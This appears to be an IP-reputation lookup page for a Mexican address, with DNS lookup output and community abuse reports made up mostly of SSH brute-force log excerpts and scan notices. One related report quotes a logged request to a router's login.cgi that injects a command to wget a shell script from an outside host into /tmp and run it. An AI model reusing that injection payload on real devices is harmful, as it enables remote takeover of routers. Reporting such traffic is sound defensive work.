189.213.21.66 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: Mexico

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
189.213.217.91	attackspam	Honeypot attack, port: 445, PTR: PTR record not found	2020-03-16 18:42:25
189.213.214.50	attackspambots	Attempt to attack host OS, exploiting network vulnerabilities, on 02-01-2020 23:05:31.	2020-01-03 08:54:37
189.213.21.140	attackspambots	MultiHost/MultiPort Probe, Scan, Hack -	2019-11-27 18:23:15
189.213.210.35	attackspam	Aug 28 14:40:26 aat-srv002 sshd[21667]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.213.210.35 Aug 28 14:40:28 aat-srv002 sshd[21667]: Failed password for invalid user alanturing from 189.213.210.35 port 11747 ssh2 Aug 28 14:44:50 aat-srv002 sshd[21768]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.213.210.35 Aug 28 14:44:53 aat-srv002 sshd[21768]: Failed password for invalid user ubuntu from 189.213.210.35 port 37813 ssh2 ...	2019-08-29 03:46:51
189.213.210.35	attackspambots	Invalid user taivi from 189.213.210.35 port 22625	2019-08-28 16:17:53
189.213.210.35	attackspambots	Aug 27 11:39:53 rpi sshd[23611]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.213.210.35 Aug 27 11:39:54 rpi sshd[23611]: Failed password for invalid user huey from 189.213.210.35 port 53438 ssh2	2019-08-27 18:08:51
189.213.210.35	attack	Invalid user ca from 189.213.210.35 port 55597	2019-08-26 09:05:25
189.213.210.35	attackbots	Aug 17 16:18:08 TORMINT sshd\[2053\]: Invalid user training from 189.213.210.35 Aug 17 16:18:08 TORMINT sshd\[2053\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.213.210.35 Aug 17 16:18:10 TORMINT sshd\[2053\]: Failed password for invalid user training from 189.213.210.35 port 50679 ssh2 ...	2019-08-18 04:32:26
189.213.210.35	attackspambots	May 4 13:33:40 server sshd\[83886\]: Invalid user qe from 189.213.210.35 May 4 13:33:40 server sshd\[83886\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.213.210.35 May 4 13:33:42 server sshd\[83886\]: Failed password for invalid user qe from 189.213.210.35 port 60598 ssh2 ...	2019-08-01 09:12:34
189.213.210.35	attack	Automatic report - Banned IP Access	2019-07-31 09:38:59
189.213.210.35	attackbotsspam	Jul 16 21:11:53 animalibera sshd[20545]: Invalid user lzt from 189.213.210.35 port 49449 ...	2019-07-17 05:20:53
189.213.210.35	attack	Jul 16 13:08:23 animalibera sshd[559]: Invalid user lori from 189.213.210.35 port 40569 ...	2019-07-16 21:13:20
189.213.210.35	attackbotsspam	Feb 23 12:28:02 motanud sshd\[27593\]: Invalid user webuser from 189.213.210.35 port 56894 Feb 23 12:28:02 motanud sshd\[27593\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.213.210.35 Feb 23 12:28:03 motanud sshd\[27593\]: Failed password for invalid user webuser from 189.213.210.35 port 56894 ssh2	2019-07-03 02:31:47

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 189.213.21.66
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 21680
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;189.213.21.66.			IN	A

;; AUTHORITY SECTION:
.			597	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021300 1800 900 604800 86400

;; Query time: 16 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Feb 13 16:08:14 CST 2022
;; MSG SIZE  rcvd: 106

Host info

66.21.213.189.in-addr.arpa domain name pointer 189-213-21-66.static.axtel.net.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
66.21.213.189.in-addr.arpa	name = 189-213-21-66.static.axtel.net.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
210.195.67.96	attack	210.195.67.96 - - [18/Jul/2019:03:14:37 +0200] "GET /xmlrpc.php HTTP/1.1" 302 569 ...	2019-07-18 17:26:11
90.113.43.142	attackspambots	2019-06-23T19:21:00.752854wiz-ks3 sshd[24897]: Invalid user admin from 90.113.43.142 port 36597 2019-06-23T19:22:32.198885wiz-ks3 sshd[24911]: Invalid user admin from 90.113.43.142 port 58075 2019-06-23T19:22:33.125364wiz-ks3 sshd[24911]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=lfbn-1-6595-142.w90-113.abo.wanadoo.fr 2019-06-23T19:22:32.198885wiz-ks3 sshd[24911]: Invalid user admin from 90.113.43.142 port 58075 2019-06-23T19:22:35.221725wiz-ks3 sshd[24911]: Failed password for invalid user admin from 90.113.43.142 port 58075 ssh2 2019-06-23T19:23:23.210979wiz-ks3 sshd[24919]: Invalid user admin from 90.113.43.142 port 44303 2019-06-23T19:23:24.059258wiz-ks3 sshd[24919]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=lfbn-1-6595-142.w90-113.abo.wanadoo.fr 2019-06-23T19:23:23.210979wiz-ks3 sshd[24919]: Invalid user admin from 90.113.43.142 port 44303 2019-06-23T19:23:25.488424wiz-ks3 sshd[24919]: Failed password for invalid	2019-07-18 17:40:43
192.241.220.228	attackbots	$f2bV_matches	2019-07-18 17:05:18
220.180.223.138	attackbotsspam	TCP port 23 (Telnet) attempt blocked by firewall. [2019-07-18 03:14:19]	2019-07-18 16:52:51
123.231.245.21	attackspam	2019-07-18T01:15:28.311008abusebot.cloudsearch.cf sshd\[28303\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=123.231.245.21 user=root	2019-07-18 17:06:24
179.95.191.173	attack	Automatic report - Port Scan Attack	2019-07-18 17:32:19
91.243.166.216	attackspam	email spam	2019-07-18 16:57:21
122.80.251.180	attackbotsspam	122.80.251.180 - - [18/Jul/2019:03:15:23 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://178.128.227.29/selfrep/dlink.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "Rift/2.0" ...	2019-07-18 17:08:51
217.112.128.193	attackbots	2019-07-18T02:54:27.432322MailD postfix/smtpd[24820]: NOQUEUE: reject: RCPT from steep.jamihydraulics.com[217.112.128.193]: 450 4.1.8 : Sender address rejected: Domain not found; from= to= proto=ESMTP helo= 2019-07-18T03:04:46.182805MailD postfix/smtpd[26221]: NOQUEUE: reject: RCPT from steep.jamihydraulics.com[217.112.128.193]: 450 4.1.8 : Sender address rejected: Domain not found; from= to= proto=ESMTP helo= 2019-07-18T03:15:08.053345MailD postfix/smtpd[27314]: NOQUEUE: reject: RCPT from steep.jamihydraulics.com[217.112.128.193]: 450 4.1.8 : Sender address rejected: Domain not found; from= to= proto=ESMTP helo=	2019-07-18 17:13:59
162.247.74.213	attackbots	SSH Bruteforce @ SigaVPN honeypot	2019-07-18 17:42:23
181.120.246.83	attackspam	Jul 18 10:51:58 legacy sshd[9910]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=181.120.246.83 Jul 18 10:52:00 legacy sshd[9910]: Failed password for invalid user gg from 181.120.246.83 port 47558 ssh2 Jul 18 10:59:03 legacy sshd[10155]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=181.120.246.83 ...	2019-07-18 17:11:53
195.209.104.27	attack	@LucianNitescu Personal Honeypot Network <<<>>> Donate at paypal.me/LNitescu <<<>>> 2019-07-17 02:54:16,419 INFO [shellcode_manager] (195.209.104.27) no match, writing hexdump (fe4614a9ae709216c0d15cad619ad1e9 :11885) - SMB (Unknown)	2019-07-18 17:27:45
134.73.129.122	attackspam	Jul 18 03:14:52 [munged] sshd[553]: Invalid user dad from 134.73.129.122 port 41466 Jul 18 03:14:52 [munged] sshd[553]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=134.73.129.122	2019-07-18 17:20:40
190.13.173.67	attackbotsspam	Jul 18 05:15:01 vps200512 sshd\[30148\]: Invalid user www from 190.13.173.67 Jul 18 05:15:01 vps200512 sshd\[30148\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.13.173.67 Jul 18 05:15:03 vps200512 sshd\[30148\]: Failed password for invalid user www from 190.13.173.67 port 60500 ssh2 Jul 18 05:20:46 vps200512 sshd\[30317\]: Invalid user fit from 190.13.173.67 Jul 18 05:20:46 vps200512 sshd\[30317\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=190.13.173.67	2019-07-18 17:23:24
89.42.234.129	attackspam	2019-07-17T02:45:43.389664wiz-ks3 sshd[7410]: Invalid user mqm from 89.42.234.129 port 50217 2019-07-17T02:45:43.391825wiz-ks3 sshd[7410]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.42.234.129 2019-07-17T02:45:43.389664wiz-ks3 sshd[7410]: Invalid user mqm from 89.42.234.129 port 50217 2019-07-17T02:45:45.446953wiz-ks3 sshd[7410]: Failed password for invalid user mqm from 89.42.234.129 port 50217 ssh2 2019-07-17T02:54:19.427463wiz-ks3 sshd[7429]: Invalid user radio from 89.42.234.129 port 50253 2019-07-17T02:54:19.429563wiz-ks3 sshd[7429]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.42.234.129 2019-07-17T02:54:19.427463wiz-ks3 sshd[7429]: Invalid user radio from 89.42.234.129 port 50253 2019-07-17T02:54:21.322812wiz-ks3 sshd[7429]: Failed password for invalid user radio from 89.42.234.129 port 50253 ssh2 2019-07-17T03:02:57.955236wiz-ks3 sshd[7459]: Invalid user kodi from 89.42.234.129 port 50291 2019-07-17T03:02:57.	2019-07-18 17:43:30

Recently Reported IPs

189.213.20.198	189.213.21.157	189.213.21.67	189.213.217.191
189.213.20.199	189.213.167.76	189.213.218.62	189.213.217.227
189.213.219.226	189.213.217.62	189.213.221.225	189.213.225.106
189.213.22.213	189.213.225.134	189.213.224.204	189.213.225.170
189.213.225.182	189.213.225.138	189.213.225.146	189.213.219.44